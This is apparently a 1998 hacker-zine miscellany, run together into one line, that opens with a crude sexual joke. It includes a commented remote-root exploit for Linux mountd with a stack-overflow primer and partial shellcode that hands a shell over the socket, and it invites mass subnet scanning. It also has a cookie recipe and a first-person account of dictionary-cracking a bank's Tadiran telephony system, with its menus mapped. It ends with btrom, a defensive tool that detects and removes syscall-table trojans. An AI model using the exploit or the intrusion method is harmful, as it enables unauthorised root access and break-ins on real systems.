Vision is just a hallucination induced by energy waves bouncing around in your head. Your head is cool. COOL is a lame stock. EBAY is insanely overpriced. So are M3s. Mach 3's are cool razors. Razors are sharp. Sharp MD players are too thick. As is Mark's cock. And long! -r00t & h4g1s 0x2>------------------------------------------------------------------------- A CASE STUDY: LINUX MOUNTD STACK OVERFLOW There is nothing new here, but the code is a text book example of how buffer overflows are done. Even if you have read other articles on buffer overflows you might find something of value in here. Or maybe not. The case studied is the Linux nfsd/mountd vulnerability mentioned in the CERT advisory on Aug 28. nuuB <++> linenoise/mountd-sploit.c /* * mountd-sploit.c - Sploit for Linux mountd-2.2beta29+ (and earlier). Will * give a remote root shell. * * Cleaned up, documented and submitted to Phrack on Sep 3 1998. * * I've included a quick primer on stack overflows and made lots of comments * in the code, so if you don't know how these stack overflow exploits work * take this opportunity to learn something. * * It is trivial to extend the code (or use scripting) to make something that * automatically scans subnets or lists of IPs to find vulnerable systems. * This is left as an exercise for the enterprising young hax0rs out there. * * You need the following RPC files for your particular architecture: * * nfsmount.h * nfsmount_xdr.c * * These can be generated from 'mount.x' by the 'rpcgen' utility. I simply * lifted the files that came pre-generated with Linux 'mount'. These are * included uuencoded, but they may not work on your particular system. Don't * bug me about this. * * Compile with: * * cc mountd-sploit.c nfsmount_xdr.c -o mountd-sploit * * Have fun, but as always, BEHAVE! * * /nuuB * */ /* A QUICK PRIMER ON STACK OVERFLOWS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Read Aleph1's article in Phrack Issue 49 File 14 (P49-14) for a detailed explanation on how to write sploits (the examples are for Linux/i386 but the methodology is valid for any Unix, and can be applied to other OS's once you understand the technique). If you are targeting one of Bill's OS check out cDc #351: "The Tao of Windows Buffer Overflow" by DilDog. The properties that we take advantage of are: * The stack memory pages have the execute bit set * The return address from functions are stored on the stack on a higher address than the local variables. MEMORY MAP -- Start of stack (i.e bottom of stack - top of memory) e.g 0xc0000000 -- <** return address **> -- Top of stack (lower memory address) e.g 0xbffff9c8 -- THE OVERFLOW The trick is to overflow a local variable that is set through a function that doesn't check for overflows (strcpy, sprintf, etc). By supplying a (too) long string you can overwrite memory at higher addresses, i.e closer to the start of the stack. More specifically we want to overwrite <** return address **> with a pointer that points back into the stack that contains code we want executed. Getting the code on the stack is done by including it in the string we are overflowing with, or by placing it in an environment variable. The code can do anything you like, but the standard thing is to execve() a shell. There are often limitations on what the code can look like in order to be placed unmangled on the stack (length, touppper(), tolower(), NULL bytes, path stripping etc). It all depends on how the target program processes the input we feed it. Be prepared for some tinkering to avoid certain byte patterns and to make the code use PC/IP relative addressing. The overflow string (called the 'egg') is normally passed to the target program through command line arguments, environment variables, tcp connections or in udp packets. POSSIBLE COMPLICATIONS Sometimes you will destroy other local variables with your egg (depends on how the compiler ordered the variables on the stack). If you use a long enough egg you could also trash the arguments to the function. As your code isn't executed until the vulnerable function returns (not at the return of the function doing the actual overflowing, e.g strcpy()), you must make sure that the corrupted variables don't cause a crash before the return. This means that your egg probably has to be aligned perfectly, i.e only use one return pointer and preceed it with 'correct' values for the local variables you are trashing. Unfortuntely the ordering of the variables is often dependent on what compiler options were used. Optimization in particular can shuffle things around. This means that your exploit will sometimes have to target a particular set of options. Most of the time the trashing of other local variables isn't a problem but you may very well run into it some day. THE RETURN POINTER The only problem left is to guess the right address to jump to (i.e the return pointer). This is done either by trial and error or by examining the executable (requires you have access to a system identical to the target). A good way to get a reasonable starting value is to find out how much environment variables the target process has (hint: use 'ps uxawwwwwwwwe') and combine that with the base stack pointer (you can find that out with a one line program that shows the value of the stack pointer). To increase the chances of success it is customary to fill out the start of the egg with NOP opcodes, thus as long as the pointer happens to point somewhere in the egg before the actual code it will execute the NOPs then the code. That is all there is to it. */ /* * Now, back to our case study. * * Target: rpc.mountd:logging.c * * void Dprintf(int kind, const char *fmt, ...) { * char buff[1024]; * va_list args; * time_t now; * struct tm *tm; * * if (!(kind & (L_FATAL | L_ERROR | L_WARNING)) * && !(logging && (kind & dbg_mask))) * return; * ... * vsprintf(buff, fmt, args); <-- This is where the overflow is done. * ... * if (kind & L_FATAL) * exit(1); * } <-- This is where our code (hopefully) gets executed * * This function is called from (e.g) mountd.c in svc_req() as follows: * * #ifdef WANT_LOG_MOUNTS * Dprintf(L_WARNING, "Blocked attempt of %s to mount %s\n", * inet_ntoa(addr), argbuf); * #endif * * Looks great (WANT_LOG_MOUNTS appears to be defined by default). Type * L_WARNING is always logged, and all we have to do is to try to mount * something we are not allowed to (i.e as long as we are not included in * /etc/exports we will be logged and get a chance to overflow). * * The only complication is the first %s that we will have to compensate for * in the egg (our pointers must be aligned correctly). * * We use 5 pointers to avoid problems related to how the compiler organized * the variables on the stack and if the executable was compiled with or * without -fomit-frame-pointer. * * 3 other local variables (size=3*4) + 1 frame-pointer + 1 return pointer = 5 * * Still plenty of room left for NOPs in the egg. We do have to make sure that * if the 3 other variables are trashed it won't cause any problems. Examining * the function we see that 'now' and 'tm' are initialized after the vsprintf() * and are thus not a problem. However there is a call 'va_end(args)' to end * the processing of the ellipsis which might be a problem. Luckily this is * a NOP under Linux. Finally we might have trashed one of the arguments * 'kind' or 'fmt'. The latter is never used after the vsprintf() but 'kind' * will cause a exit(1) (bad!) if kind&L_FATAL is true (L_FATAL=0x0008). * Again, we are in luck. 'kind' is referenced earlier in the function and in * several other places so the compiler has gratiously placed it in a register * for us. Thus we can trash the arguments all we want. * * Actually, if you examine the executables of mountd in the common distros * you will find that you don't have to trash any variables at all as 'buffer' * is placed just before the frame pointer and the return address. We could * have used a simple egg with just one pointer and this would have worked * just as well in practise. * * All this 'luck' is in fact rather common and is the reason why most buffer * overflows are easy to write so they work most of the time. * * Ok. Delivery of the egg is done through the RPC protocol. I won't go into * details here. If you are interested, get the sources for the servers and * clients involved. Half the fun is figuring out how to get the egg in place. * * The last piece of the puzzle is to keep shoveling data from the local * terminal over the TCP connection to the shell and back (remember that * we used dup2() to connect the shell's stdout/in/err to the TCP connection). * * Details below. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include "nfsmount.h" /* * First we need to write the code we want executed. * * C0de: setreuid(0, 0); fork(); dup2(0, 1); dup2(0, 2); execve("/bin/sh"); * * setreuid() is probably not necessary, but can't hurt. * * fork() is done to change pid. This is needed as someone - probably the * portmapper - sends signals to mountd (the shell has no handlers for these * and would die). * * The dup2()'s connect stdout/stderr to the TCP socket. * * The code assumes 'mountd' communicates with the client using descriptor * zero. This is the case when it is started as a daemon, but may not be so if * it is launched from inetd (I couldn't be bothered to test this). The * dup2()'s may need to be changed accordingly if so. * * For Linux/i386 we would get: */ #if 0 void c0de() { __asm__( "jmp .get_string_addr\n\t" /* Trick to get address of our string */ ".d01t:\n\t" "xorl %eax,%eax\n\t" "movl %eax,%ebx\n\t" /* ruid=0 */ "movl %eax,%ecx\n\t" /* euid=0 */ "movb $0x46,%eax\n\t" /* __NR_setreuid */ "int $0x8 0x3>------------------------------------------------------------------ ------- Eleet ch0c0late ch1p co0kies by Juliet The chocolate chip cookies is an old exploit. You can use it to bribe your teachers, sysadmins, bosses, even feds. Never underestimate the cookie. Picture this.. little girlie walks up to you in the NOC.. offers you a home-baked chocolate chip cookie! She must be someone's secretray.. or something.. wow she sure fooled you.. anyway.. bake them.. they are good.. DO NOT substitue ingrediants.. other than like M&M's for chocolate chips.. 1 cup (packed) golden brown sugar 1/2 cup sugar 1/2 cup solid vegetable shortening, room temperature 1/2 cup (1 stick) unsalted butter, room temperature 2 large eggs 1 tablespoon vanilla extract 3 cups all purpose flour 1 teaspoon baking soda 1 teaspoon salt 1 12-ounce package semisweet chocolate chips Preheat oven to 350F. Using electric mixer, beat both sugars, shortening and butter in large bowl until light and fluffy. Beat in eggs and vanilla. Mix flour, baking soda and salt in large bowl. Add dry ingredients to butter mixture and mix until blended. Stir in chocolate chips. Drop dough by heaping tablespoonfuls onto heavy large baking sheets, spacing 2 inches apart. Bake until golden brown, about 12 minutes. Transfer baking sheets to racks; cool 5 minutes. Transfer cookies to racks; cool completely. Makes about 42 cookies.. or you can make ONE BIG pan cookie 0x4>------------------------------------------------------------------ ------- - Tadiran; Computer Telephony Integration (CTI) - Blakboot Introduction ============ Hello everyone. This article is primarily about Tadiran Telecommunications software and hardware used to syncronize computer applications with phone calls. I will be refering to system version 9.63.03.01 and any variants as just `Tadiran`. From firsthand experiences with this type of system I've found that they can be configured to do many things, from trunk timers to on hold music. Although a very powerful system, the Tadiran lacks basic security. This is a no no, especially when it provides worldwide technologies for all types of industries, including banking. The issue of lack of security is mainly why I wanted to write this article. The Tadiran is very much open to intrusion. How it began ============ A phreak friend of mine, Mf-Man, and I were scanning for loops, we found a carrier. We took a short look at the system for a while, until our interests waned and took us elsewhere.. Months later, bored, I dialed into the system, with plans of throwing a dictonary file at it at steady pace (Tadiran, only requires a password for authentication). So, I just sat back, and waited... After a long while, to my gleeful surprise, it cracked! I (like many others before me) did that zealous happy dance. This system, Tadiran, is rather cryptic without documentation. Even still, I managed to dig up some interesting info. This system I managed to get into was that of a CTI system from a well known bank. The major flaws thus far (I plan to write a more in depth article): * Unlimited password attempts. * No login names. * A password prompt that responds, well, promptly. What follows are some screen shots of the Tadiran system. The system ========== Password prompt: ENTER PASSWORD Bad password Msg.: ILL PASSWORD , TRY AGAIN ! System prompt: *: Enviroment: Tree menus; menus branch from root, and so on. -This the root menu, the menu sent upon login.- (ROOT) CCS 9.63.03.01 SMDI & 24SDT Copyright (c) 1991-1997 Tadiran Telecommunications Ltd. NAME - xxxxxxxxx SAU # - xxxx 0-CONFIG 1-DIAGN 2-TABLES 3-ADMIN 4-ROUTING/COST 5-ISDN 6-DATA 7-CoraLINK 8-NETWORK 9-HELP Any of the menus/options can be choosen by number, or name. Control keys: ^C / ESC ------ Go back 1 menu. ^T ------ Displays account and system information. EXAMPLE: CCS: xxxxxxxx xxx-xx-1998 10:48pm Terminal No.: 4, Password level: 0 Software Version: 9.63.03.01 SMDI & 24SDT ^P ------ Relogin. /* There are others--they seem have something to do with emulation, and scrolling. *\ Menu descriptions - ment for reference. ========================================= This is a list of globally accessable menus, available by typing, "HELP" NOTE: I've "x"'d out all group names from the orignal system this information was recovered from. PI MESSAGES =(MSG) FEAT. & AUTH. =(FEAT) SMDR CONTROL = (SMDR) 47/8T CARD_DB =(TKDB) FEATURE TIMERS=(FE.T) STATION TIMERS =(ST.T) ALT ROUT TK.GRP=(ROUT) GROUPS =(GROUP) SYSTEM GEN. =(SYSGEN) xxxx/xxx GROUP =(xxxx) xxxxxxx GROUP =(xxxx) SYS FEATURES = (SFE) xxxx GROUP =(xxxx) IST/SLT CARD_DB=(STDB) SYS TIME SET-UP=(TIME) BUSY PORTS =(BUSY) IST/SLT DEF. =(SLT) TERMINAL SET-UP=(TERM) CARD DATA-BASE = (CDB) LCR/ROUTING =(LCR) TOLL BARRIER =(TOLL) CARD LIST =(CLIS) xxxxxxxxx =(xxx) TONE PLAN = (TON) CLASS OF SERVICE=(COS) xxxxxxxxxxxxx=(xxxxx) TRUNK DEFINITION=(TRK) COST_CALC. =(COST) NUMBERING PLAN =(NPL) TRUNK_GROUP =(TKGP) DATA SERVICES =(DATA) PICKUP GROUP =(PICK) TRUNK GRP DEF =(TGDEF) xxxx CARD DB =(DIDB) PORT DATABASE =(PDB) TRUNK PORTS =(TRUNK) xxx/xxx GROUP =(DIDG) PORT LIST =(PLIS) TRUNK TIMERS =(TK.T) DIGITAL TRUNK =(DTDB) PREFERENCE =(PREF) WAKEUP =(WAKEUP) KEY DEFINITION = (KEY) DIGITAL BUS LIST=(DLIS) ZONED GROUP =(VPZ) KEY PROGRAMING =(PROG) RINGER P.S. =(RPS) VFAC =(VFAC) KEYSET TIMERS =(EK.T) SIZES DEF =(SIZ) GROUP CALL =(CALL) PI MESSAGES - Terminal setup, diag/stim. 47/8T CARD_DB - Card information. Example: LS_RING_PAUS (sec)- 5 GS_RING_PAUS (sec)- 1 O/G BREAK_TIME(ms)- 60 O/G MAKE_TIME (ms)- 40 O/G INTERDGT_T(ms)- 800 GS_DISCONNECT (ms)- 800 METER (4TMR) : f0 (0=16K,1=12K,2=50Hz)- 0 f0 ACCURACY +/-(1-10)% - 3 METER_AFTER_DISCONNECT (Y/N) - N ALT ROUT TK.GRP - Add, display, update, or remove trunk group. BUSY PORTS - Displays what ports are busy. CARD DATA-BASE - List many submenus of card, in which you may get/update CARD LIST - EXAMPLE: shelf#/slot# p_type i_type card_db# vers/subver status 0 / 1 NO_CARD NO_CARD --- --- --- ------ 0 / 2 8DTR/S NO_CARD --- 17 8 ACTIVE 0 / 3 T1 T1 1 14 38 ACTIVE CLASS OF SERVICE - ST/TK, and ATT show all kinds of information on trunk control. TENANTS deals with group access. COST_CALC. - Information about costs for certain services, at various times. DIGITAL TRUNK - Card/trunk information, configuration, channel signaling. KEY DEFINITION - Telephone configuration EXAMPLE: prm_cos- 1 sec_cos- 1 priv_libs- 12 terminal- N origin- N block- N o/g_tk_rest- N privacy- Y excl_hold- N hard_hold- N last_num- Y security- N att- Y auto_unatt-N passcode- NONE check_out- N multi_app- Y m.a.mute_ring-Y mute_ring- Y auto_ans- N idle_disp.-Y keyclick- Y music- Y music_num- 0 v_page_in- Y auto_ans_v_p- Y auto_hld/xfer/off-1 spkr_on/off-Y blind_att- N pcc- Y pc_acd- N mic- Y comb_audio-N display_size- NO_DSP language-DEFAULT but_num- 2 ksi- N ksi_type- 0 eis- N send_id- Y ali- NONE aoc-e_display-N alert_makecall-N active dpem id's- NONE installed dpems- 1 dkt: spkr_environment- 1 music_on_hold - 0 KEYSET TIMERS - EXAMPLE: 1 unit = 0.1 sec. AUTO_ANSWER - 10 AUTO_ANS_V_PAGE - 10 TONE_TO_IDLE - 10 AOC-E_DISPLAY - 300 MUTE_RING - 50 FEAT. & AUTH - Authorizations, and system features. Check here to see if Call trace OR caller ID is active. FEATURE TIMERS - This is a bit interesting. EXAMPLE: * (1 unit =1.0 sec) ** (1 unit =0.1 sec) ***(1 unit =0.01 sec) *AUTO_REDIAL- 30 *REMIND_SNOOZE- 60 *WAKEUP_SNOOZE- 60 **WAKEUP_RING - 300 **NET_FEATURE_ACK- 40 **SUSP_OFFHK- 5 BELL_RING: **ON_BELL - 10 **OFF_BELL - 20 **ATT.MSG- 50 **EXPENSIVE_ROUTE_TONE - 10 **RING- 100 **SUPV_RECALL- 3600 **CONF_SUPV_RECALL- 1800 **BREAK_IN/OUT- 10 BREAKIN_WARNING: **ON - 1 **OFF - 20 GROUPS - List of submenus, of groups. IST/SLT CARD_DB - Ring information. IST/SLT DEF. - Slot of line info. EXAMPLE: prm_cos- 0 sec_cos- 0 priv_libs- 3 terminal- N origin- N block- N o/g_tk_rest-N privacy- Y excl_hold-N hard_hold- N last_num- Y security- N att- N auto_unatt-N passcode- NONE check_out- N type- 1 announcer- N multi_app- N send_id- Y ali- NONE opx- N hf_relevant-Y music_on_hold-0 LCR/ROUTING - Libraries, update, or display. NUMBERING PLAN - Lines, and there features: UPDATE, DISPLAY, ADD, REMOVE, or SHOW STATION TIMERS - EXAMPLE: 1 unit = 0.1 sec. RING- 450 MULT_APR_RING- 200 BUSY- 1200 REORDER- 50 CONFIRM- 30 DVMS- 200 HOLD- 6000 HARD_HOLD- 1200 PARK- 1200 PAGE_Q- 600 1st_DGT - 100 INTERDGT- 150 FEAT_DIAL- 700 HKFLS_FILTER- 10 MAGNETO_AUTO_ANS- 30 CF_NO_ANS- 200 SYSTEM GEN - MENU: (SYSGEN) 0-INSTALL 1-SIZES_DEF 2-SIZES_TAB 3-SPEED_CALLS (MCC only) 4-MUSIC 5-TIME_SLOTS (4GC only) 0-TRUNK_CALLS_OUTGOING SYSTEM FEATURES - Trunk_calls_incoming, station_options, intercept/ incomplete, call_forwarding, camp_on, hotel,messaging, tones, diagnosrics, ISDN, network, and wireless TONE PLAN - EXAMPLE: ~~~~~~~~ NO NAME TYPE #SEG 1TN Msec 2TN Msec 3TN Msec 4TN Msec 5TN Msec 6TN Msec 0 Busy 3 2 3 500 0 500 0 0 0 0 0 0 0 0 1 Dial 1 0 1 0 0 0 0 0 0 0 0 0 0 0 2 Distinct. 1 0 4 0 0 0 0 0 0 0 0 0 0 0 3 Reorder 3 2 3 240 0 240 0 0 0 0 0 0 0 0 4 Ringback 3 2 2 2000 0 4000 0 0 0 0 0 0 0 0 5 Silence 1 0 0 0 0 0 0 0 0 0 0 0 0 0 6 Tick 3 2 5 60 0 1000 0 0 0 0 0 0 0 0 8 Confirm 3 2 1 100 0 100 0 0 0 0 0 0 0 0 9 BRK_In/Out 1 0 5 0 0 0 0 0 0 0 0 0 0 0 11 V.P Conf 3 2 3 100 5 100 0 0 0 0 0 0 0 0 12 Z.P Warn 3 2 6 300 3 100 0 0 0 0 0 0 0 0 14 LCR_expens 2 6 0 120 5 80 0 120 5 80 0 120 5 80 15 LCR_cheap 2 4 0 120 5 80 0 120 5 80 0 0 0 0 16 Call Wait 3 4 5 600 0 5000 0 5000 0 5000 0 0 0 0 17 DISA Dial 1 0 1 0 0 0 0 0 0 0 0 0 0 0 TRUNK DEFINITION - EXAMPLE: DISA (0-NO /1-IMMED. /2-DELAY)- 0 COS.- 10 TK_TIMER#- 1 TYPE (0-PULSE /1-DTMF /2-MIX)- 1 I/C_ONLY-N O/G_ONLY-N BUSY_OUT-N AUTO_GUARD-N HOT_IMMED-N HOT_DELAY-N DROP_NO_DIAL-N RSRVD_TO- NONE CALLER_ID_TIMEOUT - 50 TRUNK TIMERS - EXAMPLE: H.FLASH(10ms)- 67 INCOMING : E&M_SEIZE_TO_WINK- 1 E&M_CONT_WINK_TIME- 2 OUTGOING : E&M_CONT_WINK/SG_DELAY- 1 SEIZE_TO_DIAL- 15 SECOND_DIAL_TONE- 60 VFAC - Account maintance. - Requires password. ---The ones that I didn't list were either self-explanitory, or N/A 0x5>--------------------------------------------------------------- ---------- b t r o m b y r i q ------------------------------------------------------------------- ----------- "trojan eraser or i want my system call table clean" ------------------------------------------------------------------- ----------- i n t r o d u c t i o n ------------------------------------------------------------------- ----------- The other day, I started to play with the itf that appeared in P52-18 (read that article if you want to know what it does, etc). It occured to me one good way to determine if someone has installed the trojan (and to subsequently remove it) is by fixing the system call table. This program tries to do that. This works with the the linux x86 2.0 and 2.2 series. ------------------------------------------------------------------- ----------- i n t e r n a l s ------------------------------------------------------------------- ----------- The program first attempts to detect if you are using a BIG_KERNEL (a bzImage) or not (a zImage). One of the differences is the address of the kernel in memory. BIG_KERNEL starts at 0xc0000000 while the other starts at 0x00100000. The system call table (sct) has the entries of all the system calls. If you modify the sct, the new entry must be `out of range'. btrom will try to fix these `out of range' system calls with their original values. They are taken from the System.map. What i mean with "`out of range'" is an entry that has a value out of the start_of_the_kernel and the_start_of_the_kernel + some_value. This value is in the config.h ------------------------------------------------------------------- ----------- q u i c k i n s t a l l ------------------------------------------------------------------- ----------- compile: -------- 1) edit config.h and Makefile. Modify it if you want. $ vi config.h $ vi Makefile 2) make $ make use: ---- 1) be root $ su - 2) install the module mbtrom # insmod mbtrom 3) run btrom # ./btrom _nr_mbtrom_ [options] 4) uninstall the module mbtrom # rmmod mbtrom ------------------------------------------------------------------- ----------- c h a c h a r a ------------------------------------------------------------------- ----------- 1st part: detect trojans legends [ ] this is ok. dont worry [N] this is a null enter in the system call table. dont worry. [-] this is the entry of the module mbtrom. dont worry. [?] this entry has a system function, but it was supposed to be null. worry [*] this is probably a trojan in a reserved space. worry. [!] this is probably a trojan in a not reserved space. worry. 2nd part: clean trojans legends [DEL: press 's' to fill this entry with the System.map's value. press 'c' to clean this entry. it will be filled with a null entry. press 'm' to put in this entry a manual hexa address. press 'i' to ignore, skip, what you want. ------------------------------------------------------------------- ----------- n o t e s ------------------------------------------------------------------- ----------- this program doesnt uninstall trojan modules. this program disables the trojans, so, after that, you can uninstall the trojan with 'rmmod'. ------------------------------------------------------------------- ----------- b u g s ------------------------------------------------------------------- ----------- if `insmod mbtrom' doesnt returns any value, is because you are redirecting that message with syslogd. Please check /etc/syslog.conf and see "kern". ------------------------------------------------------------------- ----------- h i s t o r y ------------------------------------------------------------------- ----------- * version 0.3 (01/12/98) compatible with kernel 2.0 y 2.2. works with BIG_KERNEL and with SMALL english version * version 0.2 (25/11/98) first version * version 0.1 (21/11/98) something really ugly * all this happened when i see the itf (intregated trojan facility in P52-18) ------------------------------------------------------------------- ----------- f e e d b a c k ------------------------------------------------------------------- ----------- riq@ciudad.com.ar <++> linenoise/btrom/Makefile # # Makefile del b t r o m # ## BUG. This must be the same as the one in config.h SYSTEM_MAP = "/usr/src/linux/System.map" AWK = awk CC = gcc #CFLAGS = -DSYSTEM_MAP=$(SYSTEM_MAP) all: parse btrom mbtrom parse: $(AWK) -f sys_null.awk $(SYSTEM_MAP) > sys_null.h btrom: btrom.o $(CC) btrom.c -O2 -Wall -o btrom mbtrom: $(CC) -c -O3 -Wall -fomit-frame-pointer mbtrom.c clean: rm -f mbtrom.o btrom.o btrom sys_null.h <--> <++> linenoise/btrom/btrom.c /* * btrom - Borra Trojanos Modulo * por Riq * 1/Dic/98: 0.3 - Compatible con kernel 2.2 y soporta BIG_KERNEL * 25/Nov/98: 0.2 - Version inicial. Soporta kervel 2.0 i386 */ #include #include #include #include #include #include #include #include #include "config.h" #include "sys_null.h" FILE *sm; FILE *au; int quiet; int borrar; int dif_n_s; unsigned int big_kernel; /****************************************************************** ***** System.map ******************************************************************* *****/ int sm_b_x_nom( unsigned int *address, char *estoy ) { char buffer[200]; char sys_add[20]; fseek(sm,0L,SEEK_SET); while( fgets(buffer,200,sm) ) { if( fnmatch(estoy,buffer,0)==0 ) { strncpy(sys_add,buffer,8); sys_add[8]=0; *address = strtoul(sys_add,(char **)NULL,16); return 1; } } return 0; } int sm_busca_x_nombre( unsigned int *address, char *estoy) { char nombre[50]; sprintf(nombre,"*T sys_%s\n",estoy); return sm_b_x_nom(address, nombre); } FILE* sm_open() { return fopen( SYSTEM_MAP, "r" ); } /****************************************************************** ***** asm/unistd.h ******************************************************************* *****/ void au_dame_el_nombre( char *dst, char *orig ) { int i,j; j=i=0; while( orig[i]!='_' ) i++; i=i+5; while( orig[i]!=' ' && orig[i]!='\t' ) dst[j++]=orig[i++]; dst[j]=0; } int au_b_x_num( char *nombre, int numero ) { char buffer[200]; char buscar[50]; /* FIXME: ?sera mas efectivo regexec() que fnmatch()? */ sprintf(buscar,AU_PREFIX"%i*",numero); while( fgets(buffer,200,au) ) { if( fnmatch(buscar,buffer,0)==0 ) { au_dame_el_nombre(nombre,buffer); return 1; } } /* No encontre... entonces una segunda pasada */ fseek(au,0L,SEEK_SET); while( fgets(buffer,200,au) ) { if( fnmatch(buscar,buffer,0)==0 ) { au_dame_el_nombre(nombre,buffer); return 1; } } return 0; } int au_busca_x_numero(char *nombre, int numero) { return au_b_x_num(nombre,numero); } FILE* au_open() { return fopen( ASM_UNISTD, "r" ); } /*****************************************/ /* Comun a la primer y segunda recorrida */ /*****************************************/ int comun_1er_2da( int j, int i , char *nombre , char *c, int clean, unsigned int retval) { int a; a = clean; /* bug fix */ nombre[0]=0; /* i!=0 porque el asm/unistd del kernel 2.2 no viene */ if( i!=0 && au && au_busca_x_numero(nombre,i)) { if( retval > big_kernel + LIMITE_SYSCALL ) { *c = '*' ; clean++; } else *c = ' '; } else { if( retval > big_kernel+LIMITE_SYSCALL ) *c = '!'; else *c = '?'; clean++; } if(i==j) { /* modulo btrom */ *c='-'; clean=a; } else if(retval==SYS_NULL || retval==0) {/* Null pointer */ *c='N'; clean=a; } return clean; } /****************************************************************** **** primer_recorrida: Detectar troyanos ******************************************************************* ***/ int primer_recorrida(int j) { char nombre[50]; int address; int i,old_clean,clean; unsigned int retval; char c; old_clean=clean=0; printf( "\n1st part: Detect trojans\n" " [ ]=OK [N]=Null [-]=btrom\n" " [?] Mmm...syscall\n" " Address [*][!]=trojan routine\n" " now System.map Num [ ] Syscall Name\n" "----------------------------------------------\n"); for( i=0; i< NR_syscalls; i++ ){ __asm__ volatile ( "int $0x80":"=a" (retval):"0"(j), "b"((long) (i)), "c"((long) (0)), "d"((long) (0))); clean = comun_1er_2da(j,i,nombre,&c,clean,retval); if( !quiet || clean > old_clean ) { if( nombre[0]!=0 ) { if( sm && sm_busca_x_nombre(&address,nombre)) { if(retval!=address && retval < big_kernel + LIMITE_SYSCALL) { dif_n_s++; printf("%8x!%8x %3i [%c] %s\n",retval,address,i,c,nombre); } else printf("%8x %8x %3i [%c] %s\n",retval,address,i,c,nombre); } else printf("%8x %3i [%c] %s\n",retval,i,c,nombre); } else printf("%8x %3i [%c]\n",retval,i,c); old_clean = clean; } } return clean; } /****************************************************************** **** segunda_recorrida: Limpiar troyanos ******************************************************************* ***/ int segunda_recorrida(int j) { char nombre[50],dire[50]; int address; int i,old_clean,clean,retval,key; char c; unsigned int k; old_clean=clean=0; printf( "\n2nd part: Clean Trojans\n" " s = System.map address\n" " c = clean address\n" " m = manual address\n" " i = ignore\n" " now System.map Num [ ] Syscall Name\n" "---------------------------------------\n"); for( i=0; i< NR_syscalls ; i++ ){ __asm__ volatile ( "int $0x80":"=a" (retval):"0"(j), "b"((long) (i)), "c"((long) (0)), "d"((long) (0))); clean = comun_1er_2da(j,i,nombre,&c,clean,retval); if( clean > old_clean ) { if( nombre[0]!=0 ) { if( sm && sm_busca_x_nombre(&address,nombre)) { if(retval!=address && retval < big_kernel + LIMITE_SYSCALL) { dif_n_s++; printf("%8x!%8x %3i [%c] %s ?",retval,address,i,c,nombre); } else printf("%8x %8x %3i [%c] %s ?",retval,address,i,c,nombre); } else printf("%8x %3i [%c] %s ?",retval,i,c,nombre); } else printf("%8x %3i [%c] ?",retval,i,c); old_clean = clean; fseek(stdin,0L,SEEK_END); key=fgetc(stdin); switch(key) { case 's': k = address; break; case 'c': k = SYS_NULL; break; case 'm': printf("Enter an hexa address (ex: 001a1b):"); fseek(stdin,0L,SEEK_END); fgets( dire,50,stdin ); k = strtoul(dire,(char **)NULL,16); break; default: k=1; break; } /* FIXME: 1 no se puede poner como address */ if(k!=1) __asm__ volatile ( "int $0x80":"=a" (retval):"0"(j), "b"((long) (i)), "c"((long) (1)), "d"((long) (k))); } } return clean; } void help() { printf( "\nUsage: btrom nr_of_mbtrom [-c][-v]\n" "\t1) Install the module mbtrom with`insmod mbtrom'\n" "\t2) The module must return a value.If not see the README->bugs\n" "\t btrom value_returned_by_mbtrom [-c][-v]\n" "\t `v' is verbose. Recommended\n" "\t `c' is clean. Cleans the trojans\n" "\t3) Uninstall the module mbtrom with 'rmmod mbtrom'\n" "\n" "\tExamples:\n" "\t btrom 215 -cv\n" "\t btrom 214 -v\n" "\t btrom 215\n" "\nWarning: Dont put random numbers. Be careful with that!" "\nRecommended: Do `btrom _number_ -v' before a cleaning\n\n" ); exit(-1); } void chequear_argumentos( char *parametros ) { int i,j; i=strlen(parametros); if(parametros[0]!='-') help(); for(j=1;j3 ) help(); quiet = 1; borrar = 0 ; if( argc==3) chequear_argumentos(argv[2]); au = au_open(); sm = sm_open(); if(!au && !quiet) printf("Error while opening `asm/unistd.h' in `"ASM_UNISTD"'\n"); if(!sm && !quiet) printf("Error while opening `System.map' in `"SYSTEM_MAP"'\n"); dif_n_s=0; /* __NR_mbtrom number */ i = atoi( argv[1] ); if(!i) help(); /* Chequeo si es BIG_KERNEL o no */ __asm__ volatile ( "int $0x80":"=a" (retval):"0"(i), "b"((long) (0)), "c"((long) (2)), "d"((long) (0))); big_kernel =(retval>BIG_KERNEL?BIG_KERNEL:SMALL_KERNEL); /* Primer recorrida */ clean = primer_recorrida( i ); /* Mensaje del senior btrom */ printf( "\nb t r o m s a y s:\n"); if(dif_n_s>0) { printf( "Your System.map seems to have a problem.\n"); if(dif_n_s <++> linenoise/btrom/config.h /* config.h usado por btrom.c y mbtrom.c */ /* Modificar segun los gustos */ /* Numero que uno supone que esta vacio en la sys_call_table */ #define NUMERO_VACIO 215 /* Path al archivo System.map */ /* Si Ud. nunca compilo el kernel tal vez sea /boot/System.map */ /* FIXME: Usar el define del Makefile para no definir esto en 2 partes */ #ifndef SYSTEM_MAP #define SYSTEM_MAP "/usr/src/linux/System.map" #endif /* Hay problemas con old y new. Gralmente no es problema de la System.map */ #define SYSMAP_LIMIT 8 /* Path al archivo asm/unistd.h */ #define ASM_UNISTD "/usr/include/asm/unistd.h" /* Prefijo a buscar en asm/unistd.h*/ #define AU_PREFIX "#define*__NR_*" /* Hasta donde llega el kernel space */ /* FIXME: No se cual es el limite realmente. Igual con esto anda :-) */ #define LIMITE_SYSCALL 0x00300000 /* No modificar */ /* Version del btrom */ #define VERSION "0.3" /* BIG_KERNEL y SMALL_KERNEL*/ #define BIG_KERNEL 0xc0000000 #define SMALL_KERNEL 0x00100000 <--> <++> linenoise/btrom/mbtrom.c /* * modulo del btrom - Borra Trojanos Modulo * 25/11/98 - por Riq * * compile with: * gcc -c -O3 -fomit-frame-pointer mbtrom.c * */ #define MODULE #define __KERNEL__ #include #ifdef MODULE #include #include #else #define MOD_INC_USE_COUNT #define MOD_DEC_USE_COUNT #endif #include #include #include #include #include #include #include #include #include #include #include "config.h" #include "sys_null.h" extern void *sys_call_table[]; int __NR_mbtrom; int* funcion( int numero, int modo, unsigned int *address ) { switch(modo){ case 0: return sys_call_table[numero]; break; case 2: return (void *)&sys_call_table; case 1: default: sys_call_table[numero]=address; break; } return (void *)0; } int init_module(void) { __NR_mbtrom = NUMERO_VACIO ; /* Chequea direccion vacia desde NUMERO_VACIO hasta 0 */ while ( __NR_mbtrom!= 0 && sys_call_table[__NR_mbtrom] != 0 && sys_call_table[__NR_mbtrom] != (void *)SYS_NULL ) __NR_mbtrom--; if(!__NR_mbtrom ) { /* Si es 0 